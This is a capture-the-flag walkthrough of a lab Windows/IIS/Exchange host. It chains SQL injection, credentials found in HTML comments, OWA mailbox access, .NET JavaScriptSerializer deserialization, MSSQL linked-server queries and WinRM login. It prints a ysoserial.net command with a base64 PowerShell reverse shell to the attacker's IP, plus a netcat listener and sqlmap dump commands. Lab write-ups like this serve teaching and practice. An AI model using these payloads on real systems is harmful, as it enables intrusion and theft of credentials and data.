Context

Enumeration

Rustscan

sudo rustscan -t 1500 -b 1500 --ulimit 65000 -a 10.13.37.12 -- -sV -sC -oA ./{{ip}}

Ports

Open 10.13.37.12:443
Open 10.13.37.12:1433
Open 10.13.37.12:3389
Open 10.13.37.12:5985

Services

PORT     STATE SERVICE       REASON          VERSION
443/tcp  open  https?        syn-ack ttl 127
1433/tcp open  ms-sql-s      syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2070.00; GDR1
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
3389/tcp open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Curl

curl -ik https://10.13.37.12
HTTP/2 200 
content-type: text/html; charset=utf-8
server: Microsoft-IIS/10.0
x-powered-by: ARR/3.0
date: Sat, 11 Mar 2023 08:22:03 GMT
content-length: 2548

Dirsearch

dirsearch -u https://10.13.37.12 --deep-recursive -x 400,403
[08:32:05] Starting: 
[08:32:13] 200 -    3KB - /ADMIN                                            
[08:32:13] 200 -    3KB - /Admin                                            
[08:32:14] 401 -    0B  - /Microsoft-Server-ActiveSync/                     
[08:32:14] 302 -  208B  - /OWA/  ->  https://10.13.37.12/owa/auth/logon.aspx?url=https%3a%2f%2f10.13.37.12%2fOWA%2f&reason=0
[08:32:19] 200 -    3KB - /admin                                            
[08:32:20] 200 -    3KB - /admin/?/login                                    
[08:32:20] 200 -    3KB - /admin/                                           
[08:32:20] 200 -    3KB - /admin/index                                      
[08:32:27] 401 -    0B  - /api                                              
[08:32:27] 401 -    0B  - /api/                                             
[08:32:27] 401 -    0B  - /api/2/explore/     (Added to queue)              
[08:32:27] 401 -    0B  - /api/2/issue/createmeta
[08:32:27] 401 -    0B  - /api/error_log
[08:32:27] 401 -    0B  - /api/jsonws
[08:32:27] 401 -    0B  - /api/jsonws/invoke                                
[08:32:27] 401 -    0B  - /api/login.json                                   
[08:32:27] 401 -    0B  - /api/package_search/v4/documentation     (Added to queue)
[08:32:27] 401 -    0B  - /api/swagger
[08:32:27] 401 -    0B  - /api/v2                                           
[08:32:27] 401 -    0B  - /api/v1                                           
[08:32:27] 401 -    0B  - /api/swagger.yml
[08:32:27] 401 -    0B  - /api/v3
[08:32:27] 401 -    0B  - /api/swagger-ui.html
[08:32:27] 401 -    0B  - /api/v2/helpdesk/discover     (Added to queue)
[08:32:28] 401 -    0B  - /autodiscover/                                    
[08:32:37] 302 -  208B  - /ecp/  ->  https://10.13.37.12/owa/auth/logon.aspx?url=https%3a%2f%2f10.13.37.12%2fecp%2f&reason=0
[08:32:38] 401 -    0B  - /ews/                                             
[08:32:39] 200 -   31KB - /favicon.ico                                      
[08:32:42] 200 -    2KB - /home                                             
[08:32:49] 401 -    0B  - /microsoft-server-activesync/                     
[08:32:51] 401 -    0B  - /oab/                                             
[08:32:52] 302 -  208B  - /owa/  ->  https://10.13.37.12/owa/auth/logon.aspx?url=https%3a%2f%2f10.13.37.12%2fowa%2f&reason=0
[08:32:52] 302 -  205B  - /owa  ->  https://10.13.37.12/owa/auth/logon.aspx?url=https%3a%2f%2f10.13.37.12%2fowa&reason=0
[08:32:57] 401 -    0B  - /powershell/                                      
[08:32:59] 401 -    0B  - /rpc/

But we have SSL!?

Enumeration

Since there's not that much of stuff to cover I started with getting a deeper look on the Webpage itself. The usual stuff like going through every site and checking the page source for example.

Flag

The flag was hidden under /Home/Staff. As soon as you check the page source you will find the flag and credentials for a user.

<!-- TODO: Set up Abbie on the portal, she'll be taking over my duties while I'm away.
Karl if I forget to do this, it's jay.teignton:admin for the portal
CONTEXT{CENSORED}
-->

That shouldn't be there...

Enumeration

Using the credentials found earlier we are able to login as administrator for the webpage. First thing discovered was the new management tab where I'm able to add new products or remove current products.

This screamed SQL Injection in my face and after testing around I could confirm that we indeed have a SQL Injection here.

Can be verified by putting this into the name or certified field

'+(SELECT user_name())+'

Exploitation

Used SQLmap and a captured request from burp to dumo credentials from the database.

sqlmap -r add-post.req --batch -D webapp -T users --dump
Database: webapp
Table: users
[3 entries]
+----+----------------------------------------+----------------+-----------+------------+
| id | password                               | username       | last_name | first_name |
+----+----------------------------------------+----------------+-----------+------------+
| 1  | CENSORED                               | jay.teignton   | Teignton  | Jay        |
| 2  | CENSORED                               | abbie.buckfast | Buckfast  | Abbie      |
| 3  | CONTEXT{CENSORED}                      | test           | tester    | testing    |
+----+----------------------------------------+----------------+-----------+------------+

Flag

The flag is found under user id 3 in database table users

Have we met before?

Enumeration

I tried to use abbie.buckfast credentials to login to /ecp which unfortunately didn't work as abbie isn't an exchange admin. A login to /owa worked.

There was nothing much to check but the option to "open another mailbox" seemed interesting.

Exploitation

I checked the "People" tab to identify any users that exist and have a mailbox. In the end I was able to open jay.teningtons mailbox. Whic hwas obvious as stated in the comment for "But we have SSL!?" it states that abbie will take over his duties.

Flag

The flag can be found within jays account mailbox in the Sent Items folder.

Is it a bird? Is it a plane?

Enumeration

After getting hold of jays OWA mailbox I was able to view a mail which had the webapp attached to it. Since there's nothing else to find I will analyze the source.

One thing that I always keep an eye out for is deserialization and this time I was lucky to spot something easily.

_ViewStart.cshtml

@{
    Layout = "~/Views/Shared/_Layout.cshtml";
}

@using System.Text;
@using System.Web.Script.Serialization;
@{ 
    if (0 != Context.Session.Keys.Count) {
        if (null != Context.Request.Cookies.Get("Profile")) {
            try {
                byte[] data = Convert.FromBase64String(Context.Request.Cookies.Get("Profile")?.Value);
                string str = UTF8Encoding.UTF8.GetString(data);

                SimpleTypeResolver resolver = new SimpleTypeResolver();
                JavaScriptSerializer serializer = new JavaScriptSerializer(resolver);

                object obj = (serializer.Deserialize(str, typeof(object)) as Profile);
                // TODO: create profile to change the language and font of the website 
            } catch (Exception e) {
            }
        }
    }
}

Exploitation

I'm used to do everything on my Linux machine this time I had to switch to Windows for generating my payload. Used ysoserial.net for it.

.\ysoserial.exe -g ObjectDataProvider -f JavaScriptSerializer -o base64 -c "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AMQAzACIALAA1ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"

I then opened a listener to catch my shell

sudo rlwrap -cAr nc -lvnp 53

Next set a cookie called Profile and add the value generated by ysoserial as Value. Login to /admin and receive your shell.

listening on [any] 53 ...
connect to [10.10.14.13] from (UNKNOWN) [10.13.37.12] 38995
whoami
teignton\web_user
PS C:\Windows\system32>

Flag

The flag was located at:

C:\Users\Public\flag.txt

This looks bad!

Enumeration

Poking around the system I found an interesting folder

C:\Logs

In there was another folder called WEBDB which hold a couple of logs. To be specific a couple of MSSQL Trace Logs which can include interesting data.

Exploitation

cat log_13.trc 
????????????????????????????????????????TEIGNTON\karl.memaybe
????????????????????????????????????????CENSORED

Using the login details discovered I was able to connect to the mssql server.

Flag

Connecting to mssql server using sqsh

sqsh -S 10.13.37.12 -U teignton\\karl.memaybe -P 'CENSORED'

Find trustable links

-- Will return WEB\CLIENTS
select * from master..sysservers

Get DBs

-- Will return clients db
select * from openquery("WEB\CLIENTS", 'select name from master..sysdatabases')

Get Tables and dump content

-- Get tables
select * from openquery("WEB\CLIENTS", 'select * from clients.INFORMATION_SCHEMA.TABLES;')
-- Dump content from table card_details
select * from openquery("WEB\CLIENTS", 'select * from clients..card_details')

That's were the flag was found.

It's not a backdoor, it's a feature

Enumeration

Couldn't find that much on the DB itself so I logged into OWA using karls account to find an E-Mail that says

Hi Andy,


I have added those restrictions on Jay, and added something to the database so I can generate a client list for him. Might be overkill but I don't want him wiping the DB again.


Cheers,

Karl

Now it was time to check the DB again for stuff that could be used as a user

-- Found C:\Users\Administrator\Scripts\clientsbackup.dll
select * from openquery("WEB\CLIENTS", 'select * from clients.sys.assembly_files')

Let's get that file onto my client

-- Export content as base64 encoded string
select cast((select content from openquery([web\clients], 'select * from clients.sys.assembly_files') where assembly_id = 65536) as varbinary(max)) for xml path(''), binary base64;
go > binary.b64

I used ILSpy to decompile the dll and check the source code. You'll find a function called BackupClients there, this part holds credentials for the user jay.teignton.

Exploitation

Nothing to "exploit" just use evil-winrm to get access to the system

evil-winrm -p 'CENSORED' -u 'jay.teignton' -i 10.13.37.12

Flag

Locating the flag wasn't as straight forward as I thought. Most of the time it's just a file on Desktop or any other location. After poking around I started to check a file that seemed suspicious and was called WindowsService.exe and located in the documents folder.

# Will reveal the flag
cat .\WindowsService.exe

Key to the castle

Enumeration

whoami /all
# Basically we are an administrator at this point
Group Name                                 
==========================================
BUILTIN\Administrators

Exploitation

No need to exploit anything

Flag

The flag can be found here

C:\Users\Administrator\Documents

Last updated